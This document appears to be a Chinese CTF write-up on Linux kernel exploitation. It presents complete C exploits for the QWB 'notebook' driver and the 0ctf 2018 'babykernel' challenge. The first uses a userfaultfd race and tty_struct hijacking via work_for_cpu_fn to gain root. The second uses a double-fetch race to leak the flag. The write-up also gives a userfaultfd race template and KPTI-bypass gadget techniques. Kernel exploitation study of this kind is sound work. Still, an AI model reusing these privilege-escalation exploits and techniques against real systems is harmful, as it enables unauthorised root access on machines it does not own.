exec timeout 300 qemu-system-x86_64 -m 64M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap -monitor /dev/null 2>/dev/null -s

可以看到开启了smep,smap以及kaslr

此外内部还可以发现开启了kpti

1
2
3
4
5
$ cat /sys/devices/system/cpu/vulnerabil
ities/*
Mitigation: PTI
Mitigation: __user pointer sanitization
Mitigation: Full generic retpolin

再看init脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts

mount -t proc proc /proc
mount -t sysfs sysfs /sys

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifup eth0 > /dev/null 2>/dev/null

insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
poweroff -d 300 -f &
echo "Welcome to QWB!"

#sh
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -d 1 -n -f

重点便是notebook.ko

静态分析,设备文件初始化了read,write,ioctl这几个操作

主要漏洞在于ioctl菜单中存在一个edit功能

其允许调用kreallloc进行重新分配object,而当新的size大于旧的size时便会释放原先的obj

且下方存在一个copy_from_user这就为利用userfaultfd完成条件竞争提供了条件

这里选择利用tty设备文件完成利用

其实这题有其他不少解法,这里以学习userfaultfd的利用为主

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;
size_t kernel_base;

struct userarg
{
size_t idx;
size_t size;
void* buf;
};

int note_fd;
void* stuck_mapped_memory;

void ErrExit(char* err_msg)
{
puts(err_msg);
exit(-1);
}

void RegisterUserfault(void *fault_page, void* handler)
{
pthread_t thr;
struct uffdio_api ua;
struct uffdio_register ur;
uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
ua.api = UFFD_API;
ua.features = 0;
if (ioctl(uffd, UFFDIO_API, &ua) == -1)
ErrExit("[-] ioctl-UFFDIO_API");

ur.range.start = (unsigned long)fault_page; //我们要监视的区域
ur.range.len = PAGE_SIZE;
ur.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) //注册缺页错误处理,当发生缺页时,程序会阻塞,此时,我们在另一个线程里操作
ErrExit("[-] ioctl-UFFDIO_REGISTER");
//开一个线程,接收错误的信号,然后处理
int s = pthread_create(&thr, NULL,handler, (void*)uffd);
if (s!=0)
ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
struct userarg notearg;
notearg.idx = idx;
notearg.size = size;
notearg.buf = buf;
ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
struct userarg notearg;
notearg.idx = 0;
notearg.size = 0;
notearg.buf = buf;
ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
struct userarg notearg;
notearg.idx = idx;
notearg.size = 0;
notearg.buf = NULL;
ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
struct userarg notearg;
notearg.idx = idx;
notearg.size = size;
notearg.buf = buf;
ioctl(note_fd, 0x300, &notearg);
}

void OpenNote()
{
note_fd = open("/dev/notebook", O_RDWR);
if (note_fd < 0)
{
ErrExit("[-] err in open notebook device");
}
}

void* userfaultfd_sleep3_handler(void* arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long) arg;
puts("[+] sleep3 handler created");
int nready;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
puts("[+] sleep3 handler unblocked");
sleep(3);
if (nready != 1)
{
ErrExit("[-] Wrong poll return val");
}
nready = read(uffd, &msg, sizeof(msg));
if (nready <= 0)
{
ErrExit("[-] msg err");
}

char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
{
ErrExit("[-] mmap err");
}
struct uffdio_copy uc;
// init page
memset(page, 0, sizeof(page));
uc.src = (unsigned long) page;
uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;
ioctl(uffd, UFFDIO_COPY, &uc);
puts("[+] sleep3 handler done");
return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long) arg;
puts("[+] stuck handler created");
int nready;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
puts("[+] stuck handler unblocked");
pause();
if (nready != 1)
{
ErrExit("[-] Wrong poll return val");
}
nready = read(uffd, &msg, sizeof(msg));
if (nready <= 0)
{
ErrExit("[-] msg err");
}

char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
{
ErrExit("[-] mmap err");
}
struct uffdio_copy uc;
// init page
memset(page, 0, sizeof(page));
uc.src = (unsigned long) page;
uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;
ioctl(uffd, UFFDIO_COPY, &uc);
puts("[+] stuck handler done");
return NULL;
}

void* edit_thread(int idx)
{
puts("[+] edit thread start!");
noteedit(idx, 0, stuck_mapped_memory);
puts("[+] edit thread end!"); // won't reach here
return NULL;
}

void* add_thread(int idx)
{
puts("[+] add thread start!");
noteadd(idx, 0x60, stuck_mapped_memory);
puts("[+] add thread end!"); // won't reach here
return NULL;
}

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
int pid;
int tty_fd;

stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

OpenNote();

noteadd(0, 0x60, buf_a);
noteadd(1, 0x60, buf_a);
noteedit(1, 0x500, buf_a);
noteedit(0, TTY_STRUCT_SZIE, buf_a);
write(note_fd, buf_a, 0);


pthread_t thr_edit, thr_add;
pthread_create(&thr_edit, NULL, edit_thread, 0);
sleep(1);
pthread_create(&thr_add, NULL, add_thread, 0);
sleep(1);
puts("ready to open ptmx");
for (int i = 0; i < 20; i++)
{
tty_fd = open("/dev/ptmx", O_RDWR);
if (tty_fd < 0)
{
ErrExit("[-] ptmx open failed!");
}
read(note_fd, buf_tty, 0);
if (buf_tty[0] == 0x100005401)
{
printf("[+] tty_struct found! fd = %d\n", tty_fd);
break; // tty_struct used our slab
}
}
if (buf_tty[0] != 0x100005401)
{
ErrExit("[-] leak failed");
}

size_t ptm_unix98_ops_addr = buf_tty[3];
if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;
size_t work_for_cpu_fn_addr = work_for_cpu_fn_off + ptm_unix98_ops_addr;
size_t tty_struct_addr = buf_tty[10] - 0x50;
size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;
kernel_base = prepare_kernel_cred_addr - 0xA9EF0;

printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
printf("[+] prepare_kernel_cred addr leaked, addr: 0x%lx\n", prepare_kernel_cred_addr);
printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

size_t buf_gift[0x100];
notegift(buf_gift);
size_t note_0_addr = buf_gift[0 * 2];
size_t note_1_addr = buf_gift[1 * 2];
assert(note_0_addr == tty_struct_addr);
printf("[+] note_1 addr leaked, addr: 0x%lx\n", note_1_addr);

buf_tty[0] = 0x100005401;
buf_tty[3] = note_1_addr;
buf_tty[4] = prepare_kernel_cred_addr;
buf_tty[5] = 0;
write(note_fd, buf_tty, 0); // write to tty_struct

buf_fake_table[7] = work_for_cpu_fn_addr;
buf_fake_table[10] = work_for_cpu_fn_addr;
buf_fake_table[12] = work_for_cpu_fn_addr;
write(note_fd, buf_fake_table, 1);

// write(tty_fd, buf_a, 1);
ioctl(tty_fd, 233, 233);

read(note_fd, buf_tty, 0);
printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);

buf_tty[0] = 0x100005401;
buf_tty[3] = note_1_addr;
buf_tty[4] = commit_creds_addr;
buf_tty[5] = buf_tty[6];
write(note_fd, buf_tty, 0);
sleep(1);

// write(tty_fd, buf_a, 1);
ioctl(tty_fd, 233, 233);

printf("now uid = %d\n", getuid());

if (getuid() == 0)
{
puts("[+] root now!");
system("/bin/sh");
}
else
{
exit(-1);
}

return 0;
}

userfaultfd

userfaultfd配合copy_from_user或者copy_to_user在条件竞争中有着十分强大的作用

其作用就是监控在某一段内存中发生的页错误,并且可以由用户指定如何处理

一般情况下我们选择使用sleep()或者pause()等函数使该线程停下,这样让我们完成条件竞争构造uaf等,提供了十分便利的条件

不过在大概5.11版本前后,由于变量sysctl_unprivileged_userfaultfd不再被初识赋值为1,使得userfaultfd不再能被非root用户使用

一个模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
void* userfaultfd_stuck_handler(void* arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long) arg;
puts("[+] stuck handler created");
int nready;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
puts("[+] stuck handler unblocked");
pause();
if (nready != 1)
{
ErrExit("[-] Wrong poll return val");
}
nready = read(uffd, &msg, sizeof(msg));
if (nready <= 0)
{
ErrExit("[-] msg err");
}

char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
{
ErrExit("[-] mmap err");
}
struct uffdio_copy uc;
// init page
//这部分是缺页异常处理得到的页的内容填充
memset(page, 0, sizeof(page));
uc.src = (unsigned long) page;
uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;
ioctl(uffd, UFFDIO_COPY, &uc);
puts("[+] stuck handler done");
return NULL;
}

void RegisterUserfault(void *fault_page, void* handler)
{
pthread_t thr;
struct uffdio_api ua;
struct uffdio_register ur;
uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
ua.api = UFFD_API;
ua.features = 0;
if (ioctl(uffd, UFFDIO_API, &ua) == -1)
ErrExit("[-] ioctl-UFFDIO_API");

ur.range.start = (unsigned long)fault_page; //我们要监视的区域
ur.range.len = PAGE_SIZE;
ur.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) //注册缺页错误处理,当发生缺页时,程序会阻塞,此时,我们在另一个线程里操作
ErrExit("[-] ioctl-UFFDIO_REGISTER");
//开一个线程,接收错误的信号,然后处理
int s = pthread_create(&thr, NULL,handler, (void*)uffd);
if (s!=0)
ErrExit("[-] pthread_create");
}

int main(){
...
RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);
...
}

bypass kpti

在没有开启 KPTI保护的内核中,每当执行用户空间代码时,Linux会在其分页表中保留整个内核内存的映射,即用户地址空间和内核地址空间将使用同一个页全局目录表,并保护其访问。

KPTI(Kernel page-table isolation),即内核页表隔离。通过把进程页表按照用户空间和内核空间隔离成两块来防止内核页表泄露。可以在-append选项下添加kpti=1nopti来启用或禁用它。

而在开启了 KPTI保护的内核里,用户态页表包含了用户空间,其只含有一个用于处理中断的kernel mapping PGD。当用户空间访问内核时,会先陷入中断,进入处理中断的 trampoline mapping,该中断处理程序会建立一个正常的的kernel mapping的映射。

而为了实现 PGD的切换,内核增加了一组宏用来在进程进行用户态、内核态切换时进行页表切换。一个进程的内核态PGD(4k)和用户态 PGD(4K)一起形成了一个8KPGD。当中断发生时,内核使用切换 CR3寄存器来实现从用户态地址空间切换到内核态的地址空间。CR3bit47-bit11PGD的物理地址,最低为 bit12用于进行 PGD切换;bit12=0为内核态PGDbit12=1为用户态 PGD

CR3bit0-bit11asid(Address Space Identifier)asid也分为 内核态和用户态,最高位 bit11来进行 asid切换;bit11=0为内核态 asidbit11=1为用户态 asid

img

那么一旦开启了 KPTI,由于内核态和用户态的页表不同,所以如果使用 ret2user或内核执行 ROP返回用户态时,由于内核态无法确定用户态的页表,所以会报出一个段错误。

swap CR3

在一个开启 KPTI内核中会调用 SWITCH_KERNEL_CR3_NO_STACK函数来从用户态进入内核态,关键代码如下所示:

1
2
3
4
5
6
7
8
mov     rdi, cr3
nop
nop
nop
nop
nop
and rdi, 0xFFFFFFFFFFFFE7FF
mov cr3, rdi

该代码就是将 CR3的 第12位与第13位清零。而页表的第12位在 CR4寄存器的 PCIDE位开启的情况下,都是保留给 OS使用,这里只关心 13位置零即可,也就相当于将 CR3-0x1000

而在从内核态返回用户态时会调用 SWITCH_USER_CR3宏来切换 CR3,如下所示:

1
2
3
mov     rdi, cr3
or rdi, 1000h
mov cr3, rdi

所以,这里第一种方法就很类似绕过 smep的方法,即利用内核中已有 gadget来在返回用户态执行 iretq/sysret之前 设置 cr3。寻找 到 能够将 cr3寄存器 与 0x1000执行 或运算即可。

swapgs_restore_regs_and_return_to_usermode

第二种方法即直接利用 swapgs_restore_regs_and_return_to_usermode这个函数内的 gadget。其汇编代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
swapgs_restore_regs_and_return_to_usermode

.text:FFFFFFFF81600A34 41 5F pop r15
.text:FFFFFFFF81600A36 41 5E pop r14
.text:FFFFFFFF81600A38 41 5D pop r13
.text:FFFFFFFF81600A3A 41 5C pop r12
.text:FFFFFFFF81600A3C 5D pop rbp
.text:FFFFFFFF81600A3D 5B pop rbx
.text:FFFFFFFF81600A3E 41 5B pop r11
.text:FFFFFFFF81600A40 41 5A pop r10
.text:FFFFFFFF81600A42 41 59 pop r9
.text:FFFFFFFF81600A44 41 58 pop r8
.text:FFFFFFFF81600A46 58 pop rax
.text:FFFFFFFF81600A47 59 pop rcx
.text:FFFFFFFF81600A48 5A pop rdx
.text:FFFFFFFF81600A49 5E pop rsi
.text:FFFFFFFF81600A4A 48 89 E7 mov rdi, rsp
.text:FFFFFFFF81600A4D 65 48 8B 24 25+ mov rsp, gs: 0x5004//从此处开始执行
.text:FFFFFFFF81600A56 FF 77 30 push qword ptr [rdi+30h]
.text:FFFFFFFF81600A59 FF 77 28 push qword ptr [rdi+28h]
.text:FFFFFFFF81600A5C FF 77 20 push qword ptr [rdi+20h]
.text:FFFFFFFF81600A5F FF 77 18 push qword ptr [rdi+18h]
.text:FFFFFFFF81600A62 FF 77 10 push qword ptr [rdi+10h]
.text:FFFFFFFF81600A65 FF 37 push qword ptr [rdi]
.text:FFFFFFFF81600A67 50 push rax
.text:FFFFFFFF81600A68 EB 43 nop
.text:FFFFFFFF81600A6A 0F 20 DF mov rdi, cr3
.text:FFFFFFFF81600A6D EB 34 jmp 0xFFFFFFFF81600AA3

.text:FFFFFFFF81600AA3 48 81 CF 00 10+ or rdi, 1000h
.text:FFFFFFFF81600AAA 0F 22 DF mov cr3, rdi
.text:FFFFFFFF81600AAD 58 pop rax
.text:FFFFFFFF81600AAE 5F pop rdi
.text:FFFFFFFF81600AAF FF 15 23 65 62+ call cs: SWAPGS
.text:FFFFFFFF81600AB5 FF 25 15 65 62+ jmp cs: INTERRUPT_RETURN

_SWAPGS
.text:FFFFFFFF8103EFC0 55 push rbp
.text:FFFFFFFF8103EFC1 48 89 E5 mov rbp, rsp
.text:FFFFFFFF8103EFC4 0F 01 F8 swapgs
.text:FFFFFFFF8103EFC7 5D pop rbp
.text:FFFFFFFF8103EFC8 C3 retn


_INTERRUPT_RETURN
.text:FFFFFFFF81600AE0 F6 44 24 20 04 test byte ptr [rsp+0x20], 4
.text:FFFFFFFF81600AE5 75 02 jnz native_irq_return_ldt
.text:FFFFFFFF81600AE7 48 CF iretq

只需要从上述 mov rsp, gs: 0x5004代码处开始执行,就会依次执行 绕过 kptiiretq/sysret两种功能,自动返回用户态。

rwlock

Linux实现了一个读写锁

  • 当读锁被取出时,不能够取出写锁
  • 当写锁被取出时,不能够取出任何锁

也就是说读是可以多进程共享的,但写是进程独享的

具体实现暂时不深入聊了解

__check_object_size

在本题中出现了__check_object_size这么一个函数

一开始以为这个函数能够精准的检测一个object的大小,但实际上这个函数也只是能做一个粗略的检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
* Validates that the given object is:
* - not bogus address
* - fully contained by stack (or stack frame, when available)
* - fully within SLAB object (or object whitelist area, when available)
* - not in kernel text
*/
void __check_object_size(const void *ptr, unsigned long n, bool to_user)
{
if (static_branch_unlikely(&bypass_usercopy_checks))
return;

/* Skip all tests if size is zero. */
if (!n)
return;

/* Check for invalid addresses. */
check_bogus_address((const unsigned long)ptr, n, to_user);

/* Check for bad stack object. */
switch (check_stack_object(ptr, n)) {
case NOT_STACK:
/* Object is not touching the current process stack. */
break;
case GOOD_FRAME:
case GOOD_STACK:
/*
* Object is either in the correct frame (when it
* is possible to check) or just generally on the
* process stack (when frame checking not available).
*/
return;
default:
usercopy_abort("process stack", NULL, to_user, 0, n);
}

/* Check for bad heap object. */
check_heap_object(ptr, n, to_user);

/* Check for object in kernel to avoid text exposure. */
check_kernel_text_object((const unsigned long)ptr, n, to_user);
}
EXPORT_SYMBOL(__check_object_size);

函数要求

  • 该对象的地址有效
  • 该对象完全位于堆栈中
  • 该对象完全位于一个slab分配器的object中(可以小于)
  • 该对象不能指向内核代码段

work_for_cpu_fn

在长亭的wp中使用了work_for_cpu_fn这个函数中的gadget

源码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
struct work_for_cpu {
struct work_struct work;
long (*fn)(void *);
void *arg;
long ret;
};

static void work_for_cpu_fn(struct work_struct *work)
{
struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work);

wfc->ret = wfc->fn(wfc->arg);
}

可以看到其会有如下调用

*(arg+0x30)=*(arg+0x20)(*(arg+0x28))

也就是说这个函数不经能够劫持实现任意函数调用,同时还能存储返回值(nb嘞)

该函数位于 workqueue 机制的实现中,只要是开启了多核支持的内核 (CONFIG_SMP)都会包含这个函数的代码。不难注意到,这个函数非常好用,只要能控制第一个参数指向的内存,即可实现带一个任意参数调用任意函数,并把返回值存回第一个参数指向的内存的功能,且该 “gadget” 能干净的返回,执行的过程中完全不用管 SMAP、SMEP 的事情。由于内核中大量的 read / write / ioctl 之类的实现的第一个参数也都恰好是对应的对象本身,可谓是非常的适合这种场景了。考虑到我们提权需要做的事情只是 commit_creds(prepare_kernel_cred(0)),完全可以用两次上述的函数调用原语实现。(如果还需要禁用 SELinux 之类的,再找一个任意地址写 0 的 gadget 即可,很容易找)

细节

在某篇文章中看到,关于调用这个函数似乎还有一些细节,如下

  1. 即便修改了虚表后,调用 write 也无法执行 work_for_cpu_fn 函数的问题。我一直以为这里 write 的逻辑,用面向对象的思维来看就是直接调用 tty_struct 类重写的 write 虚函数,类似于 _IO_FILE 劫持虚表中的 write 指针后 write 就会直接执行劫持的函数的逻辑了。但是实际上不是这样的,在掉用虚表中函数指针前会先调用 tty_write 函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static ssize_t tty_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
struct tty_struct *tty = file_tty(file);
struct tty_ldisc *ld;
ssize_t ret;

if (tty_paranoia_check(tty, file_inode(file), "tty_write"))
return -EIO;
if (!tty || !tty->ops->write || tty_io_error(tty))
return -EIO;
/* Short term debug to catch buggy drivers */
if (tty->ops->write_room == NULL)
tty_err(tty, "missing write_room method\n");
ld = tty_ldisc_ref_wait(tty);
if (!ld)
return hung_up_tty_write(file, buf, count, ppos);
if (!ld->ops->write)
ret = -EIO;
else
ret = do_tty_write(ld->ops->write, tty, file, buf, count);
tty_ldisc_deref(ld);
return ret;
}

然后到 do_tty_write 中再进行用户态数据的拷贝,最后才实际调用函数指针

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
static inline ssize_t do_tty_write(
ssize_t (*write)(struct tty_struct *, struct file *, const unsigned char *, size_t),
struct tty_struct *tty,
struct file *file,
const char __user *buf,
size_t count)
{
ssize_t ret, written = 0;
unsigned int chunk;

ret = tty_write_lock(tty, file->f_flags & O_NDELAY);
if (ret < 0)
return ret;

/*
* We chunk up writes into a temporary buffer. This
* simplifies low-level drivers immensely, since they
* don't have locking issues and user mode accesses.
*
* But if TTY_NO_WRITE_SPLIT is set, we should use a
* big chunk-size..
*
* The default chunk-size is 2kB, because the NTTY
* layer has problems with bigger chunks. It will
* claim to be able to handle more characters than
* it actually does.
*
* FIXME: This can probably go away now except that 64K chunks
* are too likely to fail unless switched to vmalloc...
*/
chunk = 2048;
if (test_bit(TTY_NO_WRITE_SPLIT, &tty->flags))
chunk = 65536;
if (count < chunk)
chunk = count;

/* write_buf/write_cnt is protected by the atomic_write_lock mutex */
if (tty->write_cnt < chunk) {
unsigned char *buf_chunk;

if (chunk < 1024)
chunk = 1024;

buf_chunk = kmalloc(chunk, GFP_KERNEL);
if (!buf_chunk) {
ret = -ENOMEM;
goto out;
}
kfree(tty->write_buf);
tty->write_cnt = chunk;
tty->write_buf = buf_chunk;
}

/* Do the write .. */
for (;;) {
size_t size = count;
if (size > chunk)
size = chunk;
ret = -EFAULT;
if (copy_from_user(tty->write_buf, buf, size))
break;
ret = write(tty, file, tty->write_buf, size);
if (ret <= 0)
break;
written += ret;
buf += ret;
count -= ret;
if (!count)
break;
ret = -ERESTARTSYS;
if (signal_pending(current))
break;
cond_resched();
}
if (written) {
tty_update_time(&file_inode(file)->i_mtime);
ret = written;
}
out:
tty_write_unlock(tty);
return ret;
}

这一路上要经过一些检测和各种各样操作,一开始我使用

1
write(tty_fd, 0, 0);

这样的方法调用,一下子就会挂在 copy_from_user 上,此处需要提供一个正确的 buf,和一定的长度,比如

1
write(tty_fd, buf_a, 1);

这样就可以调用到劫持的 work_for_cpu_fn 了。

由于 work_for_cpu_fn 的参数由 write 调用的第一个参数决定,也就是 tty_struct 本身,那么被调函数偏移在 0x20,这个没什么问题

1
buf_tty[4] = prepare_kernel_cred_addr;

这样就可以了,然后第一个参数在偏移 0x28 处,也就是

1
buf_tty[5] = 0;

看似没什么问题,但是之后执行到 work_for_cpu_fn 时偏移 0x28 会莫名其妙的变成 1,导致执行 kernel_prepare_cred 时出错,估计是 tty_write 和 do_tty_write 操作中对此处的成员变量进行了操作(此成员变量是一个信号量,这里可能是为了线程同步之类的有一点改变)。

如果用虚表做 ROP 的话不需要考虑对别的变量的修改,因为不需要考虑参数的问题,但是用 work_for_cpu_fn 来进行函数调用时就需要小心一点了,所以最后还是根据长亭的 WP 换成了 ioctl 来触发。类似的,在调用函数指针前也先调用了 tty_ioctl,这个函数是一个较为巨大的 switch 结构,所以给予的 cmd 的值要比较小心,我尝试了一些随机数都无法达到效果,最后还是根据长亭 WP 用的 233 实现的,也就是

1
ioctl(tty_fd, 233, 233);

这样调用。看来 233 这个数确实还是有一些魔力。

tty_struct

在某一篇文章中ti到tty_struct结构体的大小是不一定的

tty_struct 的 size 并不一定是 0x2e0。正确定位其 size 的做法是在 ida 中解析 vmlinux ,查找字符串 “&tty->legacy_mutex” 的引用。定位到类似 v2 = (_DWORD *)sub_FFFFFFFF81236300(qword_FFFFFFFF8288F810, 21004480LL, 0x3A8LL); 的函数,最后一个参数就是 tty_struct 的大小。(即使 0x2e0 和 0x3a8 都是 0x400 的 slub)

2018-0ctf-final-babykernel

驱动主要注册了一个 baby_ioctl 函数,其中包含两个功能。

  • 当 ioctl 中 cmd 参数为 0x6666 时,驱动将输出 flag 的加载地址。
  • 当 ioctl 中 cmd 参数为 0x1337 时,首先进行三个校验,接着对用户输入的内容与硬编码的 flag 进行逐字节比较,当一致时通过 printk 将 flag 输出出来。

应该传入如下结构

1
2
3
4
5
struct _input 
{
char *flag;
size_t len;
};

检查校验时涉及到一个自己实现的检查函数

1
2
3
4
5
6
7
8
9
bool __fastcall _chk_range_not_ok(__int64 a1, __int64 a2, unsigned __int64 a3)
{
bool v3; // cf
unsigned __int64 v4; // rdi

v3 = __CFADD__(a2, a1);
v4 = a2 + a1;
return v3 || a3 < v4;
}

CFADD 的作用是 carry flag of addition,获得两数相加的 CF 位(进位),重点是 a3 < v4,其中 a3 是 (unsigned int)&current_task) + 0x1358),对应结构体中的值就是:task_struct->thread->fpu->state,而 v4 是 a1 和 a2 的和,在第二个判断条件中,对应传入的 flag 的最后一个字节的地址。

那么三条检查就分别对应:

1
2
3
1.输入的输入指针是否为用户态数据
2.数据指针内的 flag_str 是否指向用户态
3.数据指针内 flag_len 是否等于硬编码 flag 的长度

有 flag 的地址,但因为在内核空间中,直接传的话不能通过验证,所以先传入一个用户空间的合法地址,然后开另一个线程不断竞争修改其为内核空间 flag 的地址。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>

pthread_t compete_thread;
void* real_addr;
char buf[0x20] = "padding.....";
int competetion_times = 0x1000, status = 1;
#define LEN 0x1000
struct
{
char* flag_addr;
int flag_len;
}flag = {.flag_addr = buf, .flag_len = 33};

void * competetionThread(void)
{
while (status)
{
for (int i = 0; i < competetion_times; i++)
flag.flag_addr = real_addr;
}
}

int main()
{
int fd, result_fd, addr_fd;
char* temp, *flag_addr_addr;

fd = open("/dev/baby", O_RDWR);
ioctl(fd, 0x6666);
system("dmesg | grep flag > addr.txt");
temp = (char*) malloc(0x1000);
addr_fd = open("./addr.txt", O_RDONLY);
temp[read(addr_fd, temp, 0x100)] = '\0';
flag_addr_addr = strstr(temp, "Your flag is at ") + strlen("Your flag is at ");
real_addr = strtoull(flag_addr_addr, flag_addr_addr + 16, 16);

pthread_create(&compete_thread, NULL, competetionThread, NULL);
while (status)
{ for(int i = 0; i < competetion_times; i++)
{
flag.flag_addr = buf;
ioctl(fd, 0x1337, &flag);
}
system("dmesg | grep flag > result.txt");
result_fd = open("./result.txt", O_RDONLY);
read(result_fd, temp, 0x1000);
if (strstr(temp, "flag{"))
status = 0;
}
pthread_cancel(compete_thread);

printf("[+] competetion end!");
system("dmesg | grep flag");

return 0;
}

